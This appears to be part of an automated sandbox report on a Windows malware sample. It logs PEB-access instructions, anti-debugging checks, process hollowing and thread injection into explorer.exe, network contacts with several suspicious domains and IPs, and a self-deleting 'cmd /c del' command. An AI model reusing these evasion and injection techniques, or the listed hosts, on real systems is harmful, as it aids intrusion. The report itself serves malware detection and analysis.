Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F9C577 mov eax, dword ptr fs:[00000030h]	5_2_04F9C577
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F9C577 mov eax, dword ptr fs:[00000030h]	5_2_04F9C577
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F97D50 mov eax, dword ptr fs:[00000030h]	5_2_04F97D50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB3D43 mov eax, dword ptr fs:[00000030h]	5_2_04FB3D43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF3540 mov eax, dword ptr fs:[00000030h]	5_2_04FF3540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA4D3B mov eax, dword ptr fs:[00000030h]	5_2_04FA4D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA4D3B mov eax, dword ptr fs:[00000030h]	5_2_04FA4D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA4D3B mov eax, dword ptr fs:[00000030h]	5_2_04FA4D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7AD30 mov eax, dword ptr fs:[00000030h]	5_2_04F7AD30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FFA537 mov eax, dword ptr fs:[00000030h]	5_2_04FFA537
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F83D34 mov eax, dword ptr fs:[00000030h]	5_2_04F83D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F83D34 mov eax, dword ptr fs:[00000030h]	5_2_04F83D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F83D34 mov eax, dword ptr fs:[00000030h]	5_2_04F83D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F83D34 mov eax, dword ptr fs:[00000030h]	5_2_04F83D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F83D34 mov eax, dword ptr fs:[00000030h]	5_2_04F83D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F83D34 mov eax, dword ptr fs:[00000030h]	5_2_04F83D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F83D34 mov eax, dword ptr fs:[00000030h]	5_2_04F83D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F83D34 mov eax, dword ptr fs:[00000030h]	5_2_04F83D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F83D34 mov eax, dword ptr fs:[00000030h]	5_2_04F83D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F83D34 mov eax, dword ptr fs:[00000030h]	5_2_04F83D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F83D34 mov eax, dword ptr fs:[00000030h]	5_2_04F83D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F83D34 mov eax, dword ptr fs:[00000030h]	5_2_04F83D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F83D34 mov eax, dword ptr fs:[00000030h]	5_2_04F83D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05048CD6 mov eax, dword ptr fs:[00000030h]	5_2_05048CD6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_050314FB mov eax, dword ptr fs:[00000030h]	5_2_050314FB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0504070D mov eax, dword ptr fs:[00000030h]	5_2_0504070D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0504070D mov eax, dword ptr fs:[00000030h]	5_2_0504070D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0500FF10 mov eax, dword ptr fs:[00000030h]	5_2_0500FF10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0500FF10 mov eax, dword ptr fs:[00000030h]	5_2_0500FF10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA16E0 mov ecx, dword ptr fs:[00000030h]	5_2_04FA16E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F876E2 mov eax, dword ptr fs:[00000030h]	5_2_04F876E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA36CC mov eax, dword ptr fs:[00000030h]	5_2_04FA36CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB8EC7 mov eax, dword ptr fs:[00000030h]	5_2_04FB8EC7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF46A7 mov eax, dword ptr fs:[00000030h]	5_2_04FF46A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05048F6A mov eax, dword ptr fs:[00000030h]	5_2_05048F6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F9AE73 mov eax, dword ptr fs:[00000030h]	5_2_04F9AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F9AE73 mov eax, dword ptr fs:[00000030h]	5_2_04F9AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F9AE73 mov eax, dword ptr fs:[00000030h]	5_2_04F9AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F9AE73 mov eax, dword ptr fs:[00000030h]	5_2_04F9AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F9AE73 mov eax, dword ptr fs:[00000030h]	5_2_04F9AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8766D mov eax, dword ptr fs:[00000030h]	5_2_04F8766D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F87E41 mov eax, dword ptr fs:[00000030h]	5_2_04F87E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F87E41 mov eax, dword ptr fs:[00000030h]	5_2_04F87E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F87E41 mov eax, dword ptr fs:[00000030h]	5_2_04F87E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F87E41 mov eax, dword ptr fs:[00000030h]	5_2_04F87E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F87E41 mov eax, dword ptr fs:[00000030h]	5_2_04F87E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F87E41 mov eax, dword ptr fs:[00000030h]	5_2_04F87E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7E620 mov eax, dword ptr fs:[00000030h]	5_2_04F7E620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAA61C mov eax, dword ptr fs:[00000030h]	5_2_04FAA61C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAA61C mov eax, dword ptr fs:[00000030h]	5_2_04FAA61C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7C600 mov eax, dword ptr fs:[00000030h]	5_2_04F7C600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7C600 mov eax, dword ptr fs:[00000030h]	5_2_04F7C600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7C600 mov eax, dword ptr fs:[00000030h]	5_2_04F7C600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA8E00 mov eax, dword ptr fs:[00000030h]	5_2_04FA8E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031608 mov eax, dword ptr fs:[00000030h]	5_2_05031608
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB37F5 mov eax, dword ptr fs:[00000030h]	5_2_04FB37F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0502FE3F mov eax, dword ptr fs:[00000030h]	5_2_0502FE3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503AE44 mov eax, dword ptr fs:[00000030h]	5_2_0503AE44
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503AE44 mov eax, dword ptr fs:[00000030h]	5_2_0503AE44
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF7794 mov eax, dword ptr fs:[00000030h]	5_2_04FF7794
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF7794 mov eax, dword ptr fs:[00000030h]	5_2_04FF7794
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF7794 mov eax, dword ptr fs:[00000030h]	5_2_04FF7794
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F88794 mov eax, dword ptr fs:[00000030h]	5_2_04F88794
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0500FE87 mov eax, dword ptr fs:[00000030h]	5_2_0500FE87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8FF60 mov eax, dword ptr fs:[00000030h]	5_2_04F8FF60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05040EA5 mov eax, dword ptr fs:[00000030h]	5_2_05040EA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05040EA5 mov eax, dword ptr fs:[00000030h]	5_2_05040EA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05040EA5 mov eax, dword ptr fs:[00000030h]	5_2_05040EA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8EF40 mov eax, dword ptr fs:[00000030h]	5_2_04F8EF40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0502FEC0 mov eax, dword ptr fs:[00000030h]	5_2_0502FEC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAE730 mov eax, dword ptr fs:[00000030h]	5_2_04FAE730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05048ED6 mov eax, dword ptr fs:[00000030h]	5_2_05048ED6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F74F2E mov eax, dword ptr fs:[00000030h]	5_2_04F74F2E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F74F2E mov eax, dword ptr fs:[00000030h]	5_2_04F74F2E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F9F716 mov eax, dword ptr fs:[00000030h]	5_2_04F9F716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAA70E mov eax, dword ptr fs:[00000030h]	5_2_04FAA70E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAA70E mov eax, dword ptr fs:[00000030h]	5_2_04FAA70E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F740E1 mov eax, dword ptr fs:[00000030h]	5_2_04F740E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F740E1 mov eax, dword ptr fs:[00000030h]	5_2_04F740E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F740E1 mov eax, dword ptr fs:[00000030h]	5_2_04F740E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F758EC mov eax, dword ptr fs:[00000030h]	5_2_04F758EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAF0BF mov ecx, dword ptr fs:[00000030h]	5_2_04FAF0BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAF0BF mov eax, dword ptr fs:[00000030h]	5_2_04FAF0BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAF0BF mov eax, dword ptr fs:[00000030h]	5_2_04FAF0BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB90AF mov eax, dword ptr fs:[00000030h]	5_2_04FB90AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA20A0 mov eax, dword ptr fs:[00000030h]	5_2_04FA20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA20A0 mov eax, dword ptr fs:[00000030h]	5_2_04FA20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA20A0 mov eax, dword ptr fs:[00000030h]	5_2_04FA20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA20A0 mov eax, dword ptr fs:[00000030h]	5_2_04FA20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA20A0 mov eax, dword ptr fs:[00000030h]	5_2_04FA20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA20A0 mov eax, dword ptr fs:[00000030h]	5_2_04FA20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F79080 mov eax, dword ptr fs:[00000030h]	5_2_04F79080
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF3884 mov eax, dword ptr fs:[00000030h]	5_2_04FF3884
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF3884 mov eax, dword ptr fs:[00000030h]	5_2_04FF3884
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_050349A4 mov eax, dword ptr fs:[00000030h]	5_2_050349A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_050349A4 mov eax, dword ptr fs:[00000030h]	5_2_050349A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_050349A4 mov eax, dword ptr fs:[00000030h]	5_2_050349A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_050349A4 mov eax, dword ptr fs:[00000030h]	5_2_050349A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F90050 mov eax, dword ptr fs:[00000030h]	5_2_04F90050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F90050 mov eax, dword ptr fs:[00000030h]	5_2_04F90050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8B02A mov eax, dword ptr fs:[00000030h]	5_2_04F8B02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8B02A mov eax, dword ptr fs:[00000030h]	5_2_04F8B02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8B02A mov eax, dword ptr fs:[00000030h]	5_2_04F8B02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8B02A mov eax, dword ptr fs:[00000030h]	5_2_04F8B02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA002D mov eax, dword ptr fs:[00000030h]	5_2_04FA002D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA002D mov eax, dword ptr fs:[00000030h]	5_2_04FA002D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA002D mov eax, dword ptr fs:[00000030h]	5_2_04FA002D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA002D mov eax, dword ptr fs:[00000030h]	5_2_04FA002D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA002D mov eax, dword ptr fs:[00000030h]	5_2_04FA002D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_050041E8 mov eax, dword ptr fs:[00000030h]	5_2_050041E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF7016 mov eax, dword ptr fs:[00000030h]	5_2_04FF7016
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF7016 mov eax, dword ptr fs:[00000030h]	5_2_04FF7016
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF7016 mov eax, dword ptr fs:[00000030h]	5_2_04FF7016
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05044015 mov eax, dword ptr fs:[00000030h]	5_2_05044015
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05044015 mov eax, dword ptr fs:[00000030h]	5_2_05044015
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7B1E1 mov eax, dword ptr fs:[00000030h]	5_2_04F7B1E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7B1E1 mov eax, dword ptr fs:[00000030h]	5_2_04F7B1E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7B1E1 mov eax, dword ptr fs:[00000030h]	5_2_04F7B1E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF51BE mov eax, dword ptr fs:[00000030h]	5_2_04FF51BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF51BE mov eax, dword ptr fs:[00000030h]	5_2_04FF51BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF51BE mov eax, dword ptr fs:[00000030h]	5_2_04FF51BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF51BE mov eax, dword ptr fs:[00000030h]	5_2_04FF51BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF69A6 mov eax, dword ptr fs:[00000030h]	5_2_04FF69A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA61A0 mov eax, dword ptr fs:[00000030h]	5_2_04FA61A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA61A0 mov eax, dword ptr fs:[00000030h]	5_2_04FA61A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA2990 mov eax, dword ptr fs:[00000030h]	5_2_04FA2990
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05032073 mov eax, dword ptr fs:[00000030h]	5_2_05032073
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05041074 mov eax, dword ptr fs:[00000030h]	5_2_05041074
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F9C182 mov eax, dword ptr fs:[00000030h]	5_2_04F9C182
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAA185 mov eax, dword ptr fs:[00000030h]	5_2_04FAA185
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7B171 mov eax, dword ptr fs:[00000030h]	5_2_04F7B171
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7B171 mov eax, dword ptr fs:[00000030h]	5_2_04F7B171
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7C962 mov eax, dword ptr fs:[00000030h]	5_2_04F7C962
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F9B944 mov eax, dword ptr fs:[00000030h]	5_2_04F9B944
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F9B944 mov eax, dword ptr fs:[00000030h]	5_2_04F9B944
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA513A mov eax, dword ptr fs:[00000030h]	5_2_04FA513A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA513A mov eax, dword ptr fs:[00000030h]	5_2_04FA513A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0500B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0500B8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0500B8D0 mov ecx, dword ptr fs:[00000030h]	5_2_0500B8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0500B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0500B8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0500B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0500B8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0500B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0500B8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0500B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0500B8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F94120 mov eax, dword ptr fs:[00000030h]	5_2_04F94120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F94120 mov eax, dword ptr fs:[00000030h]	5_2_04F94120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F94120 mov eax, dword ptr fs:[00000030h]	5_2_04F94120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F94120 mov eax, dword ptr fs:[00000030h]	5_2_04F94120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F94120 mov ecx, dword ptr fs:[00000030h]	5_2_04F94120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F79100 mov eax, dword ptr fs:[00000030h]	5_2_04F79100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F79100 mov eax, dword ptr fs:[00000030h]	5_2_04F79100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F79100 mov eax, dword ptr fs:[00000030h]	5_2_04F79100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503131B mov eax, dword ptr fs:[00000030h]	5_2_0503131B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA2AE4 mov eax, dword ptr fs:[00000030h]	5_2_04FA2AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA2ACB mov eax, dword ptr fs:[00000030h]	5_2_04FA2ACB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8AAB0 mov eax, dword ptr fs:[00000030h]	5_2_04F8AAB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8AAB0 mov eax, dword ptr fs:[00000030h]	5_2_04F8AAB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAFAB0 mov eax, dword ptr fs:[00000030h]	5_2_04FAFAB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F752A5 mov eax, dword ptr fs:[00000030h]	5_2_04F752A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F752A5 mov eax, dword ptr fs:[00000030h]	5_2_04F752A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F752A5 mov eax, dword ptr fs:[00000030h]	5_2_04F752A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F752A5 mov eax, dword ptr fs:[00000030h]	5_2_04F752A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F752A5 mov eax, dword ptr fs:[00000030h]	5_2_04F752A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05048B58 mov eax, dword ptr fs:[00000030h]	5_2_05048B58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAD294 mov eax, dword ptr fs:[00000030h]	5_2_04FAD294
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAD294 mov eax, dword ptr fs:[00000030h]	5_2_04FAD294
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB927A mov eax, dword ptr fs:[00000030h]	5_2_04FB927A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0502D380 mov ecx, dword ptr fs:[00000030h]	5_2_0502D380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503138A mov eax, dword ptr fs:[00000030h]	5_2_0503138A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05045BA5 mov eax, dword ptr fs:[00000030h]	5_2_05045BA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F79240 mov eax, dword ptr fs:[00000030h]	5_2_04F79240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F79240 mov eax, dword ptr fs:[00000030h]	5_2_04F79240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F79240 mov eax, dword ptr fs:[00000030h]	5_2_04F79240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F79240 mov eax, dword ptr fs:[00000030h]	5_2_04F79240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB4A2C mov eax, dword ptr fs:[00000030h]	5_2_04FB4A2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB4A2C mov eax, dword ptr fs:[00000030h]	5_2_04FB4A2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7AA16 mov eax, dword ptr fs:[00000030h]	5_2_04F7AA16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7AA16 mov eax, dword ptr fs:[00000030h]	5_2_04F7AA16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F93A1C mov eax, dword ptr fs:[00000030h]	5_2_04F93A1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F75210 mov eax, dword ptr fs:[00000030h]	5_2_04F75210
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F75210 mov ecx, dword ptr fs:[00000030h]	5_2_04F75210
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F75210 mov eax, dword ptr fs:[00000030h]	5_2_04F75210
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F75210 mov eax, dword ptr fs:[00000030h]	5_2_04F75210
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F88A0A mov eax, dword ptr fs:[00000030h]	5_2_04F88A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F9DBE9 mov eax, dword ptr fs:[00000030h]	5_2_04F9DBE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503AA16 mov eax, dword ptr fs:[00000030h]	5_2_0503AA16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503AA16 mov eax, dword ptr fs:[00000030h]	5_2_0503AA16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA03E2 mov eax, dword ptr fs:[00000030h]	5_2_04FA03E2

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe

Code function: 3_2_0040ACF0 LdrLoadDll,

3_2_0040ACF0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.kcrsw.com
Source: C:\Windows\explorer.exe	Domain query: www.printrynner.com
Source: C:\Windows\explorer.exe	Domain query: www.giaxevn.info
Source: C:\Windows\explorer.exe	Network Connect: 199.59.243.222 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.counterpoint.online
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.174 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.205.231.195 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.221.114.43 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.hallmarktb.com
Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.duaidapduapjdp.site
Source: C:\Windows\explorer.exe	Domain query: www.barmanon5.pro
Source: C:\Windows\explorer.exe	Network Connect: 82.163.176.145 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.fulili.com

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe

Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1110000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\idxgunu.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Thread register set: target process: 3528			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 3528			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Process created: C:\Users\user\AppData\Local\Temp\idxgunu.exe "C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idxgunu.exe"			Jump to behavior

Source: explorer.exe, 00000004.00000000.313211621.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.368610719.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.350472428.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Managerzx
